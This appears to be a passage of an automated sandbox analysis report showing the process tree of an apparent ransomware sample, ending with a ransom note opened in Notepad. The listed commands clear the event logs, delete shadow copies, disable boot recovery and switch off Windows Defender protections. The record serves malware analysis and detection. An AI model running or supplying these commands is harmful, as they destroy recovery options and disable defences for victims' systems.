C:\Windows\system32\wevtutil.exewevtutil cl system3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
C:\Windows\system32\wevtutil.exewevtutil cl security3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\system32\wevtutil.exewevtutil cl application3⤵
- Suspicious use of AdjustPrivilegeToken
PID:196
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:2100
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
PID:1928
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵PID:1152
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:3676
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true3⤵PID:3812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4032
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵PID:820
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1420
-
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\fwdM_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:4212